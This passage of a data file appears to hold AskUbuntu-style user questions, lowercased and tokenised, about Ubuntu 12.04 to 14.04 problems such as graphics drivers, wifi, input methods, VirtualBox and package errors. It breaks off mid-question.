451803	how to disable `` system program error detected '' ?	i have a ubuntu 14.04 installed . after sometime i used it , i try to move a window to a different workspace , but it ended up the cursor locks up and can only respond to keyboard entry . i forced to log out using ctrl-alt-delete and log out . after that i rebooted . after i reboot and everytime i startup my laptop this dialog shows up everytime i boot , just after the window stuck when i try to move a window to different workspace . this is the screenshot of it https : //drive.google.com/file/d/0b-crmr8uitf5ufrjmkfowu0xsek/edit ? usp=sharing how to make it not show again everytime i boot.. sorry if the my language is bad , sorry if there is any question that similar to this .
451805	screen resolution problem with ubuntu 14.04 and virtualbox	environment : lenovo t530 running windows 7 . have installed ubuntu 14.04 on a virtual machine using vm virtual box . have installed all the updates from both virtual box and ubuntu . problem : while in ubuntu 's desktop and other ubuntu initiated programs , the window is reduced to about 3x4 inches showing in the middle of the rest of my regular virtual box window . i am seeing only the upper right hand of the screen output of what i would normally see . please help . i 've seen how do i install guest additions in a virtualbox vm ? but , none of these answers works in 14.04 .
451806	can not find a way to switch to telex text input style in ibus-unikey ( for vietnamese language )	ubuntu 14.04 desktop 64 bit version ( from 13.10 64 bit ) system upgraded via software updater ibus-unikey works fine with english and vietnamese languages choices , however i can only use one type of keyboard for vietnamese language without the option to switch to the telex text entry style . i have tried many options and still failed to find a way to change the keyboard layout . please help .
451807	ubuntu 14.04 xorg.conf problems	recently i updated from ubuntu 12.04 to 14.04 and i had a mad catz rat 7 working fine . i followed a tutorial on editing the xorg.conf file and mapping the buttons section `` inputclass '' identifier `` mouse remap '' matchproduct `` saitek cyborg r.a.t.7 mouse '' matchdevicepath `` /dev/input/event* '' option `` buttonmapping '' `` 1 2 3 4 5 6 7 2 9 10 11 12 0 0 0 '' endsection in 14.04 , i ca n't seem to get it working . i followed the same steps but this time i get a warning jayden @ jayden-system-product-name : ~ $ sudo gedit /etc/x11/xorg.conf [ sudo ] password for jayden : ( gedit:4347 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ( gedit:4347 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files i have no idea what this means but nothing is working and i ca n't seem to find any hints as to why ...
451808	laptop not working at startup	when i turn on my ubuntu laptop it goes to a black screen with a flashing dash on the top left corner of the screen please help .
451810	dual boot windows 7sp1 & ubuntu desktop	my machine is a dual boot pc with win 7 sp1 ( c : ) and win 8 ( d : ) , both are 32 bit system . i want to replace win 8 ( on d : ) with the latest ubuntu dekstop , so my dual boot pc will be win 7 sp1 ( c : ) and ubuntu ( d : ) can anyone tell me what are the steps i should take ? thanks , bk
451813	ubuntu server as a gaming router	we 've all experienced it : gaming , interrupted . room mates streaming movies , family members downloading large files , significant others using skype or facetime -- this is your bandwidth ! the lifeblood of your gaming experience ! i was looking for such gaming router with this features and then an idea pops my mind ... `` can i do the same things on an ubuntu server ? '' i think the keywords here is traffic shaping engine .
451814	is it ill advised to update ubuntu on virtualbox + best practices ?	i am running on windows 8 . i had ubuntu 12.04 running as guest on virtualbox 4.3.10 r93012 and once i updated it , it began booting into an empty black screen . i reinstalled the guest additions but it did n't help . this happened to me in the past on multiple occasions which i never learned from . is it just wrong to install ubuntu 's updates when running it as a guest os on virtualbox ? or other some best practices ( other than backing up the vdi of course ) ?
451815	installing the lubuntu 13.10 elementary lubuntu icon set in lubuntu 14.04	i noticed the 13.10 elementary lubuntu icon set is missing from lubuntu 14.04 . is there a way to re-install the 13.10 elementary icon set in lubuntu 14.04 ? it was installed by default in 13.10 . i am not sure where to find that specific icon set . thank you in advance for your assistance !
451817	extremely slow wifi	i just installed ubuntu 14.04 and my wifi is being extremely slow . when it is wired i get close to 50 mb/s but when i am on wifi i am lucky if i get 10 mb/s . here is a summary of some of my specs on my hp pavilion dv6000 processor processors intel ( r ) core ( tm ) i3-2310m cpu @ 2.10ghz 800.00mhz intel ( r ) core ( tm ) i3-2310m cpu @ 2.10ghz 800.00mhz intel ( r ) core ( tm ) i3-2310m cpu @ 2.10ghz 800.00mhz intel ( r ) core ( tm ) i3-2310m cpu @ 2.10ghz 800.00mhz network interfaces network interfaces eth0 0.00mib 0.00mib lo 0.11mib 0.11mib virbr0 0.00mib 0.00mib wlan0 3.61mib 0.69mib -computer- processor : 4x intel ( r ) core ( tm ) i3-2310m cpu @ 2.10ghz memory : 3994mb ( 1391mb used ) operating system : ubuntu 14.04 lts user name : john ( john syzemore ) date/time : sun 20 apr 2014 12:37:24 am mst -display- resolution : 1366x768 pixels opengl renderer : mesa dri intel ( r ) sandybridge mobile x11 vendor : the x.org foundation -multimedia- audio adapter : hda-intel - hda intel pch - input devices- lid switch power button power button at translated set 2 keyboard razer razer naga hex razer razer naga hex hp truevision hd synps/2 synaptics touchpad video bus hda intel pch hdmi/dp , pcm : 3= hda intel pch front headphone hda intel pch mic st lis3lv02dl accelerometer hp wmi hotkeys -printers ( cups ) - hp-officejet-4620-series : default -scsi disks- ata hitachi hts54755 hp dvd-ram uj8b1
451818	ubuntu 14.04 call trace	i am seeing a call trace in kern.log - system will shutdown cleanly apr 14 20:58:00 kernel : [ 4742.743373 ] warning : cpu : 0 pid : 26176 at /build/buildd/linux-lts-saucy-3.11.0/drivers/usb/host/ehci-hcd.c:1038 ehci_endpoint_reset+0x101/0x110 ( ) apr 14 20:58:00 kernel : [ 4742.743374 ] clear_halt for a busy endpoint apr 14 20:58:00 kernel : [ 4742.743376 ] modules linked in : cdc_acm hidp pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) ipt_masquerade iptable_nat nf_nat_ipv4 bridge stp llc bnep rfcomm binfmt_misc snd_hda_codec_hdmi xt_hl ip6t_rt nf_conntrack_ipv6 nf_defrag_ipv6 arc4 ipt_reject xt_log iwldvm snd_hda_codec_idt xt_multiport mac80211 pcmcia xt_limit xt_tcpudp xt_addrtype ppdev dell_wmi sparse_keymap nf_conntrack_ipv4 nf_defrag_ipv4 xt_state snd_hda_intel dell_laptop snd_hda_codec nvidia ( pof ) snd_hwdep ip6table_filter dcdbas ip6_tables snd_pcm nf_conntrack_netbios_ns nf_conntrack_broadcast snd_seq_midi nf_nat_ftp nf_nat iwlwifi snd_rawmidi btusb nf_conntrack_ftp snd_seq_midi_event uvcvideo nf_conntrack bluetooth videobuf2_core i7core_edac snd_seq joydev videodev yenta_socket iptable_filter pcmcia_rsrc edac_core videobuf2_vmalloc ip_tables pcmcia_core cfg80211 videobuf2_memops snd_timer psmouse x_tables snd_seq_device serio_raw lpc_ich snd parport_pc soundcore snd_page_alloc video mei_me mei wmi apr 14 20:58:00 kernel : mac_hid coretemp lp parport hid_logitech_dj usbhid hid mmc_block ahci libahci e1000e firewire_ohci sdhci_pci firewire_core sdhci crc_itu_t ptp pps_core apr 14 20:58:00 kernel : [ 4742.743450 ] cpu : 0 pid : 26176 comm : pool tainted : pf o 3.11.0-18-generic # 32~precise1-ubuntu apr 14 20:58:00 kernel : [ 4742.743452 ] hardware name : dell inc . latitude e6510/0n5khn , bios a05 08/10/2010 apr 14 20:58:00 kernel : [ 4742.743453 ] 000000000000040e ffff8801b3ff3cc8 ffffffff8173d60f 0000000000000007 apr 14 20:58:00 kernel : [ 4742.743457 ] ffff8801b3ff3d18 ffff8801b3ff3d08 ffffffff8106540c ffff8801b3ff3ce8 apr 14 20:58:00 kernel : [ 4742.743460 ] ffff880220759a84 0000000000000282 ffff880220759800 0000000000000003 apr 14 20:58:00 kernel : [ 4742.743463 ] call trace : apr 14 20:58:00 kernel : [ 4742.743470 ] [ < ffffffff8173d60f > ] dump_stack+0x46/0x58 apr 14 20:58:00 kernel : [ 4742.743475 ] [ < ffffffff8106540c > ] warn_slowpath_common+0x8c/0xc0 apr 14 20:58:00 kernel : [ 4742.743478 ] [ < ffffffff810654f6 > ] warn_slowpath_fmt+0x46/0x50 apr 14 20:58:00 kernel : [ 4742.743481 ] [ < ffffffff81051089 > ] ? default_spin_lock_flags+0x9/0x10 apr 14 20:58:00 kernel : [ 4742.743484 ] [ < ffffffff8156a6e1 > ] ehci_endpoint_reset+0x101/0x110 apr 14 20:58:00 kernel : [ 4742.743489 ] [ < ffffffff81553945 > ] usb_hcd_reset_endpoint+0x25/0x70 apr 14 20:58:00 kernel : [ 4742.743493 ] [ < ffffffff81554f18 > ] usb_reset_endpoint+0x28/0x40 apr 14 20:58:00 kernel : [ 4742.743496 ] [ < ffffffff815559fe > ] usb_clear_halt+0x6e/0x80 apr 14 20:58:00 kernel : [ 4742.743499 ] [ < ffffffff8155ed6e > ] proc_clearhalt+0x6e/0x90 apr 14 20:58:00 kernel : [ 4742.743502 ] [ < ffffffff8156112a > ] usbdev_do_ioctl+0x91a/0xc50 apr 14 20:58:00 kernel : [ 4742.743507 ] [ < ffffffff810c8883 > ] ? futex_wake+0x113/0x130 apr 14 20:58:00 kernel : [ 4742.743510 ] [ < ffffffff8156148e > ] usbdev_ioctl+0xe/0x20 apr 14 20:58:00 kernel : [ 4742.743513 ] [ < ffffffff811c6eac > ] do_vfs_ioctl+0x7c/0x2f0 apr 14 20:58:00 kernel : [ 4742.743516 ] [ < ffffffff810ca662 > ] ? sys_futex+0x142/0x1a0 apr 14 20:58:00 kernel : [ 4742.743518 ] [ < ffffffff811c71b1 > ] sys_ioctl+0x91/0xb0 apr 14 20:58:00 kernel : [ 4742.743523 ] [ < ffffffff817521dd > ] system_call_fastpath+0x1a/0x1f apr 14 20:58:00 kernel : [ 4742.743525 ] -- - [ end trace 81f54da6ba3c1276 ] -- -
451821	14.04 upgrade : sysklogd disappeared without replacement !	i just upgraded from 13.10 to 14.04 with do-release-upgrade and i lost my syslog daemon in the proceedings . klogd and sysklogd were removed without any replacement functionality being installed . ( i only noticed once i realized my postfix logs had n't updated since the upgrade ! ) when i try to apt-get install sysklogd i see : package sysklogd is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source ... . e : package 'sysklogd ' has no installation candidate i installed syslog-ng instead and i guess everything is working . here 's /var/log/dist-upgrade/apt.log : https : //gist.github.com/tdsmith/11132673 my questions : it 's a bug that my system had no syslog capability after the upgrade , right ? where should i report it ?
451822	how can i get ubuntu 12.04 to act and feel like ubuntu 10.04 ?	i recently upgraded from 10.04 to 12.04 on my desktop computer but i do not like the new look , feel or the way that i can not customize 12.04 like i used to be able to in 10.04 . please help if you can . thank you kindly .
451827	how to add a path permanatly in matlab and save it ?	how to add a path permanantly in matlab and save it ?
451828	can older wallpapers be used in newer releases ?	is there a way to get the old wallpaper ( for instance from 13.10 ( ? i really liked one of them and 14.04 does not have it
451831	error generating cache while installing vlc	i am using ubuntu-13.10 . i am trying to install vlc-2.1.3 from source . i downloaded the dependencies , and executed ./configure command . it executes fine . but while executing make , i get this error : make [ 2 ] : entering directory `/home/username/downloads/vlc-2.1.3/bin' cc vlc.o cc override.o ccld vlc cc rootwrap.o rootwrap.c : in function 'main ' : rootwrap.c:244:12 : warning : ignoring return value of 'setuid ' , declared with attribute warn_unused_result [ -wunused-result ] setuid ( uid ) ; ^ ccld vlc-wrapper cc vlc_static-vlc.o cc vlc_static-override.o ccld vlc-static cc cachegen.o ccld vlc-cache-gen gen ../modules/plugins.dat /bin/bash : line 4 : 31637 segmentation fault ( core dumped ) ./vlc-cache-gen ../modules make [ 2 ] : *** [ ../modules/plugins.dat ] error 139 make [ 2 ] : leaving directory `/home/giri/downloads/vlc-2.1.3/bin' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/giri/downloads/vlc-2.1.3' make : *** [ all ] error 2 how can i fix this ? thanks in advance !
451833	problems with photoshop on wine	i want to run the photoshopcs5launcher.sh in wine so i run the command : sudo ./photoshopcs5launcher.sh i get message : wine : /home/srtpl/.wine/wineprefixes/photoshopcs5 is not owned by you what is the solution for it ?
451836	unity problems after updating to 14.04 from 13.10	i updated form 13.10 to 14.04 , x starts up , i get the gui log in , everything appears normal , but after i log in there is only the wallpaper and the cursor . i tried right clicking : nothing . ctrl+alt+t : nothing . i removed my graphics driver , re-installed it . i booted up with low graphics , still the same problem . i am using an ati radeon hd 5750 graphics card .
451837	hardware accelerated video playback using mplayer	i 'm running ubuntu 14.04 . i need video acceleration for mplayer . i found this blog that gives me the information . http : //www.webupd8.org/2012/11/install-mplayer-with-va-api-hardware.html but the problem is i have dual graphics . i have both intel on board graphics and when graphic intensive applications are run , my laptop uses the amd radeon graphics . i want mplayer to use the ati radeon graphic card . can i go ahead and follow the procedure for amd graphic as in this guide ? will this cause any damage to my normal drivers ? full system spec : dell inspiron 15r se 7520 laptop
451838	macvlan interfaces beyond first interface fail to connect .	i 've been working on a project to build a set of macvlans on ubuntu . the process i 'm using comes from here . in short , i run this set of commands to build and initialize an interface : ip link add link eth0 < name_of_macvlan_dev > address < mac_address_for_macvlan > type macvlan ip link set < name_of_macvlan_dev > up dhclient < name_of_macvlan_dev > this process works for the first macvlan i set up . further macvlans successfully acquire a unique mac , but they fail to ping google . what am i missing here ? is there material that i should read to become more familiar with macvlans ? additionally , there seems to be a limit of 10 macvlan devices . after i solve my first problem , is there a way to increase that limit ?
451839	shell script issue : cron job script to restart mysql server when it stops accidentally	i have this script , i am using it to setup cron job to execute this script , so it can check if mysql service is running ; if not then it restart the mysql service : # ! /bin/bash service mysql status| grep 'mysql start/running ' > /dev/null 2 > & 1 if [ $ ? ! = 0 ] then sudo service mysql restart fi i have setup cron job as . sudo crontab -e and then added , */1 * * * * /home/ubuntu/mysql-check.sh problem is that it restart mysql on every cron job execution.. even if server is running it restart the mysql service what is correction in the script to do that .
451840	accents stop working all of a sudden in libreoffice	i can write characters such as á , é , ó , ã , ê , etc just fine in kubuntu 14.04 . even in libreoffice . however , if i switch windows from libreoffice to , say , chrome or even dolphin , and then i switch back to libreoffice , these characters will not register anymore and instead plain a , e , o , a , e will be written , with no accents . this is very annoying and i 've been fiddling with kde system settings for the past couple of hours unsuccessfully . i 'd really like some help . thanks in advance ,
451841	xubuntu 14.04 ibus anthy problem	so i recently upgraded to the latest release of xubuntu , 14.04 . i got everything working quite well except for one thing , ibus , and anthy for japanese input . i have installed the language in `` language support , '' and also have anthy installed . whenever i go into ibus preferences input section and try to press add an input , it shows up on the list of available inputs for a split second then disappears again . does anyone know how i might fix this ? i see people having issues with ibus , but not this issue.. thanks !
451842	after upgrading to ubuntu 14.04 , my shortcuts keys and media keys no longer work	i just upgraded from 13.10 to 14.04 ( gnome interface ) and none of the shortcut key combinations or fn+f ( # ) controls seem to be working any more ( not even the default ones , like ctrl+alt+t for terminal ) . additionally , i have an hp wireless keyboard with extra media control and volume toggle buttons . these no longer function either . going to settings- > keyboard- > shortcuts and attempting manual changes does n't work what changed in 14.04 to cause this ? i never had any problems at all with saucy ! i did n't change my keyboard configuration or anything like that , and when i tested the keys with showkey they all worked , so something got lost with the keyboard mapping when the upgrade happened .
451846	nvidia version for ( 12.04 ) kernel 3.2.0-60-generic	what is the appropriate nvidia version for ( 12.04 ) kernel 3.2.0-60-generic ? i am asking because after recent updates , unity reverted to 2d only . i tried to purge and re-install the driver , plus file renaming , but the nvidia-304 driver will not provide 3d mode . my opengl version string is : 2.1.2 nvidia 304.116 nvidia-319 or nvidia-331 is mentioned elsewhere in askubuntu to be the version i should install . my graphics card is a geforce 7300 le/pcie/sse2 . more research - xorg.0.log file states : '' nvidia ( gpu-0 ) : display ( dell 1907fp ( crt-0 ) ) does not support nvidia 3d '' . but this 1907fp display has been running 3d for several months , until this month . such blatant untruth suggests mr dell has pressured mr nvidia to obsolete my vdu . i have long wondered why questions about 3d + nvidia are seldom answered properly at askubuntu . now i fear i can guess . i am sad that ubuntu may be used as a vehicle for unethical business . yes , pc is old but meets my needs and has performed well until now . i am retired but will test with different vdu display from a friend . should i change graphics card also ? any comments please ? 319 and 331 - i tried this 2-step suggestion : sudo apt-get purge nvidia* sudo apt-get install nvidia-319-updates-dev during the latter there were mostly references to 331 being installed , surprisingly , until nearing the end it dropped back to 319 . but ; '' the system is running in low graphics mode - your screen , graphics card and input device settings could not be detected correctly . you will need to configure these yourself '' enter , reboot - a screen of four choices : run in low graphics mode for just one session reconfigure graphics troubleshoot the error exit to login but with no tab key , no arrow keys and no mouse response the screen is useless . i could alt-ctrl-f1 only , only to repeat the above useless screen . after a few days of pc holiday turning pc withdrawal , i tried another 2-step : sudo apt-get purge nvidia* sudo apt-get install nvidia-current-updates-dev pc is working again locked in primitive unity-2d , with noticeable delays now for some operations . i found installation disk 12.04 lts but it 's old 2012 ; do n't want to use it . hmm , mr nvidia 's coders have successfully crippled my old card , even in ubuntu ? time for a new pc , with no nvidia components ? i hope this helps someone . any ideas ?
451847	desktop icons not showing up in xubuntu ( and i cant right click on the desktop )	in xubuntu , my desktop icons have dissapeared . i can not remember the cause , but if i do , i will edit this and put it here . also , when i try to right click on the desktop , nothing happens . i have tried many reboots , but nothing worked . if i have to reset what was on my desktop , that is fine , because all that was on it was some shortcuts to some files . edit : i can view my desktop files from the file manager , if that helps . edit 2 : i have found a solution , after a lot of researching , i just needed to type xfdesktop in terminal : d
451850	12.04 computer crashed , now i get update error below	installarchives ( ) failed : ( reading database ... dpkg : warning : files list file for package `libgnome-keyring-common ' missing , assuming package has no files currently installed . dpkg : warning : files list file for package `ifupdown ' missing , assuming package has no files currently installed . dpkg : warning : files list file for package `libmagic1 ' missing , assuming package has no files currently installed . ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % dpkg : unrecoverable fatal error , aborting : files list file for package `openssh-client ' contains empty filename error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 2 )
451854	enable minimize on click feature in 14.04 with gsettings ?	i do n't have admin priv to install compizconfig-settings-manager on this machine . anyone figured the setting that this option adds when it 's enabled in ccsm ?
451855	how do i autoconnect to vpn in lubuntu 12.04	i am a linux newbie , tech oldie ... i have configured openvpn in network manager for the connections offered by my vpn . on the one i want to auto connect , i ticked the box to have it auto connect . this does not work , and googling says it is a well known problem ... by searching , i found that if i type this in the terminal , it will connect to my vpn as desired : nmcli con up uuid e1e8cc82-c766-483f-a102-33e265fd7cfd i then found that lubuntu 12.04 uses /etc/xdg/lxsession/lubuntu/autostart to start applications at startup for all users . i have tried adding the above , with and without a preceding @ symbol . neither works . please help a newbie out ...
451858	blank desktop after upgrading lubuntu to the next version	i recently have experienced the same problem twice when upgrading two computers - once when upgrading lubuntu 12.10 to 13.10 and again today when upgrading a second computer from 12.10 to 14.04 . in both cases after logging in the desktop opened to a blank wallpaper - no panel and none of my desktop folders etc . right clicking the desktop brings up a menu with various options not all of which work . in both cases logging out and back into guest session shows the full desktop with panel and folders etc . how can i fix this ?
451862	ubuntu 14.04 : nvidia drivers can not be installed	i have an asus laptop with a nvidia card . lspci tells me : 01:00.0 vga compatible controller : nvidia corporation gf119m [ geforce 610m ] ( rev a1 ) i did a fresh install of ubuntu 14.04 lts ( 64-bit edition ) . by default , ubuntu 14.04 uses the nouveau drivers , but they do n't work very well ( blinking cursor , slow 3d display , etc . ) , so i would like to install the proprietary nvidia drivers . i go in system settings > software & updates > additional drivers . ubuntu proposes me the following options : whatever i try to select ( other than nouveau ) , after i click on `` apply changes '' , it reverts to nouveau without any additional feedback ... so i tried to install the drivers manually with apt : $ sudo apt-get install nvidia-331 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nvidia-331 : depends : lib32gcc1 but it is not going to be installed depends : libc6-i386 but it is not going to be installed e : unable to correct problems , you have held broken packages . if i try to manually install the packages mentioned , i get this error : $ sudo apt install lib32gcc1 libc6-i386 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libc6-i386 : depends : libc6 ( = 2.19-0ubuntu5 ) but 2.19-0ubuntu6 is to be installed e : unable to correct problems , you have held broken packages . what can i do to fix this ? also , do you think it 's a bug ? ( if so i will raise it in launchpad ) thanks in advance !
451870	does nmbd binds on a ipv6-only network ?	after moving my samba to a ipv6-only environment , nmbd does n't start up anymore ... i tried this : interfaces = 2001 : db8:1:1 : :/64 and with this : bind interfaces only = yes ... but , nmbd does n't starts up , the log.nmbd shows : [ 2014/04/21 03:36:38 , 3 ] ../lib/util/util_net.c:70 ( interpret_string_addr_internal ) interpret_string_addr_internal : getaddrinfo failed for name 0.0.0.0 [ address family for hostname not supported ] any tips ? ! i 'm totally newbie with windows/samba things and i do n't even know if nmbd in fact , works with ipv6 ... btw , smbd works okay in a ipv6-only environment , shares are working and , smbclient -l fileserver -n shows : fileserver is an ipv6 address -- no workgroup available this is because of nmbd is now , obsolete ? i 'm thinking that nmbd have nothing to do with ipv6 , am i right ? using ubuntu 12.04.4 . cheers ! thiago
451871	how to disable autohide in global menu ?	i am using the newest version of ubuntu 14.04 and i like the global menu bar feature but i want the menus to always be visible not only when i hover my mouse over it . is there a way to do that ? because the menus ( like file , edit , view etc . ) disappear as soon as you move your mouse away from the menu bar at the top ... : ( please help ! thanks !
451875	error while loading shared libraries : libogg.so.0 : can not open shared object file : no such file or directory	i 'm trying to install auteria ( 32-bit ) on my ubuntu 14.04 64-bit ( trusty ) . it used to work on ubuntu 13.10 64-bit , but now when i try to start the game the terminal gives me the following error : error while loading shared libraries : libogg.so.0 : can not open shared object file : no such file or directory locate libogg.so.0 gives me : /usr/lib/x86_64-linux-gnu/libogg.so.0 /usr/lib/x86_64-linux-gnu/libogg.so.0.8.1 i tried sudo apt-get install libogg.so.0:386 but it tells me that no such package could be found . does anybody know if the 32-bit libogg.so.0 can be found in any package at all or is there another solution to this problem ? many thanks in advance ! ! !
451876	dtmf broken in linphone ubuntu 14.04	so here 's the problem . linphone 3.5.2-10 installed on xubuntu 13.07 ( i386 ) worked fine , dtmf tones recognized on calls to both australian and us numbers . linphone 3.6.1-2.1build2 installed on xubuntu 14.04 ( amd64 ) generates dtmf tones which are n't recognized on calls to australian or us numbers . selecting `` send dtmfs as sip info '' does n't make any difference . anyone else seeing this ? fix coming ?
451880	problem in runing rdock ( error while loading shared libraries )	i installed rdock on ubuntu 13.10 according to its manual ( http : //rdock.sourceforge.net/manuals/getting-started/ ) . i finished the steps and it seems it was installed successfully . after make test i got : ok ( 55 tests ) the test succeeded ! the results agree with the reference ones . have fun using rdock ! ! the problem is when i want to run one of the executable files from its build/bin directory this error comes up : mehdizadeh @ mehdizadeh-all-series : ~/documents/rdock/rdock_2013.1_src $ ./bin/rbcavity ./bin/rbcavity : error while loading shared libraries : librbt.so.rdock_2013.1_src : can not open shared object file : no such file or directory i should mention that the `` lib '' directory and librbt.so.rdock_2013.1_src exist in `` rdock_2013.1_src '' directory . i would be thankful if anyone could help
451883	not able to disable the cups service using boot-up manager	in the bootup-manager , i have disabled cups because i do n't have any printers connected to my laptop . but , still the cups service gets automatically started . how to disable such services ? btw , i am using 14.04 . i changed the permission of the /etc/init.d/cups* files to 000 and still on reboot i see the services when i run the ps -aef | grep -i cups command . praveensripati @ myubuntulaptop : /etc/init.d $ ls -ltr cups* -- -- -- -- -- 1 root root 3184 apr 3 22:19 cups -- -- -- -- -- 1 root root 1961 apr 7 21:04 cups-browsed praveensripati @ myubuntulaptop : /etc/init.d $ ps -aef | grep -i cups root 1154 1 0 18:26 ? 00:00:00 /usr/sbin/cups-browsed root 3083 1 0 18:26 ? 00:00:00 /usr/sbin/cupsd -f lp 3087 3083 0 18:26 ? 00:00:00 /usr/lib/cups/notifier/dbus dbus : // lp 3088 3083 0 18:26 ? 00:00:00 /usr/lib/cups/notifier/dbus dbus : // lp 3089 3083 0 18:26 ? 00:00:00 /usr/lib/cups/notifier/dbus dbus : // lp 3090 3083 0 18:26 ? 00:00:00 /usr/lib/cups/notifier/dbus dbus : // lp 3091 3083 0 18:26 ? 00:00:00 /usr/lib/cups/notifier/dbus dbus : // praveen+ 3466 3129 0 18:33 pts/14 00:00:00 grep -- color=auto -i cups
451884	is grive still ignoring files that start with `` . '' ( hidden )	i am considering alternatives to dropbox . i have read that grive ( version 0.2 ) ignores files that start with `` . '' ( hidden ) . this means that my git directories wont get sync which is a show stopper for me . is this still true or has it changed with version 0.3 ?
451885	14.04 trusty+gnome : how do i add application icons onto the top panel ?	ubuntu 14.04 trusty tahr , gnome . how do i add application icons on the top panel ? this is what i had on precise : and this is what i have on trusty : i tried icon dragging and the right click , but they only launch the application . edit : note that this question is about ubuntu 14.04 trusty tahr , the thing that worked in previous releases ( such as precise ) does not work anymore .
451887	ca n't create application launcher in lubuntu 14.04	in lubuntu 13.10 you could create a custom application launcher by right-clicking on the desktop and selecting `` create new ... '' then selecting the option , but in 14.04 this option is gone ( now you can only create a new folder or empty file ) . just wondered whether this is a bug or if i have to enable it from somewhere else . thanks in advance ! edit : a workaround is to add an entry to the start menu by using menulibre ( sudo apt-get install menulibre ) . then you can select the item from the menu and right click 'add to desktop ' .
451888	wifi is not available on ubuntu 14.04	i have been using windows xp since past 9 years and i just installed ubuntu 14.04 today for my project purpose . but i am facing a problem..i am not able to connect to my wifi connection not is there any setting pertaining to wifi ( enabling nor connecting ) .wifi is working fine with xp . i have a dell inspiron n1545 laptop with intel core2duo processor and dell wireless card . would some1 be able to help me with this . ?
451893	detected displays wrong after upgrade to 14.04	upgrade to 14.04 - screen display finds 1 built-in monitor , however i have 2 identical `` lacie photon20vision ii '' screens ( neither built-in ) attached to a ati radeon card . it does not seem to be possible to manage this from the screen display system controls . resolution 1600x1200 is correct . lspci | grep vga 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rv710 [ radeon hd 4350/4550 ] xrandr -q xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 400 , current 1600 x 1200 , maximum 1600 x 1200 default connected primary 1600x1200+0+0 0mm x 0mm 1600x1200 0.0* 1280x1024 0.0 1152x864 0.0 1024x768 0.0 800x600 0.0 640x480 0.0 720x400 0.0
451896	intel opencl sdk installation error ( ubuntu 12.04 )	i am using intel cpu and nvidia gpu ( ubuntu 12.04 ) . i do the following things : 1.download public key 2.sudo rpm -- import intel-e901-172e-ef96-900f-b8e1-4184-d7be-0e73-f789-186f.pub 3.rpm -- checksig opencl-1.2-base-3.2.1.16712-1.x86_64.rpm 4.rpm -- checksig opencl-1.2-devel-3.2.1.16712-1.x86_64.rpm 5.rpm -- checksig opencl-1.2-intel-cpu-3.2.1.16712-1.x86_64.rpm 6.rpm -- checksig opencl-1.2-devel-3.2.1.16712-1.x86_64.rpm 7.rpm -- checksig opencl-1.2-intel-mic-3.2.1.16712-1.x86_64.rpm the checksig are all correct . 8.download intel opencl sdk 9.tar xvf intel_sdk_for_ocl_applications_xe_2013_r3_sdk_3.2.1.16712_x64.tgz 10.cd intel_sdk_for_ocl_applications_xe_2013_r3_sdk_3.2.1.16712_x64 11.sudo ./install-cpu.sh then i get the following error : rosfuerte @ rosfuerte-k53sm : ~/tool/intel_sdk_for_ocl_applications_xe_2013_r3_sdk_3.2.1.16712_x64 $ sudo ./install-cpu.sh in case of failure please consult readme file rpm : rpm should not be used directly install rpm packages , use alien instead ! rpm : however assuming you know what you are doing ... error : failed dependencies : /bin/sh is needed by opencl-1.2-base-1:3.2.1.16712-1.x86_64 lsb-core-amd64 > = 4.0 is needed by opencl-1.2-base-1:3.2.1.16712-1.x86_64 libnuma.so.1 ( ) ( 64bit ) is needed by opencl-1.2-base-1:3.2.1.16712-1.x86_64 libstdc++.so.6 ( ) ( 64bit ) is needed by opencl-1.2-base-1:3.2.1.16712-1.x86_64 /usr/sbin/update-alternatives is needed by opencl-1.2-devel-1:3.2.1.16712-1.x86_64 /bin/sh is needed by opencl-1.2-devel-1:3.2.1.16712-1.x86_64 /usr/sbin/update-alternatives is needed by opencl-1.2-intel-cpu-1:3.2.1.16712-1.x86_64 /bin/sh is needed by opencl-1.2-intel-cpu-1:3.2.1.16712-1.x86_64 ld-linux-x86-64.so.2 ( ) ( 64bit ) is needed by opencl-1.2-intel-cpu-1:3.2.1.16712-1.x86_64 ld-linux-x86-64.so.2 ( glibc_2.3 ) ( 64bit ) is needed by opencl-1.2-intel-cpu-1:3.2.1.16712-1.x86_64 lsb-core-amd64 > = 4.0 is needed by opencl-1.2-intel-cpu-1:3.2.1.16712-1.x86_64 libnuma.so.1 ( ) ( 64bit ) is needed by opencl-1.2-intel-cpu-1:3.2.1.16712-1.x86_64 libstdc++.so.6 ( ) ( 64bit ) is needed by opencl-1.2-intel-cpu-1:3.2.1.16712-1.x86_64 libstdc++.so.6 ( cxxabi_1.3.1 ) ( 64bit ) is needed by opencl-1.2-intel-cpu-1:3.2.1.16712-1.x86_64 libstdc++.so.6 ( cxxabi_1.3 ) ( 64bit ) is needed by opencl-1.2-intel-cpu-1:3.2.1.16712-1.x86_64 libstdc++.so.6 ( glibcxx_3.4 ) ( 64bit ) is needed by opencl-1.2-intel-cpu-1:3.2.1.16712-1.x86_64 libstdc++.so.6 ( glibcxx_3.4.9 ) ( 64bit ) is needed by opencl-1.2-intel-cpu-1:3.2.1.16712-1.x86_64 /usr/sbin/update-alternatives is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 /bin/sh is needed by 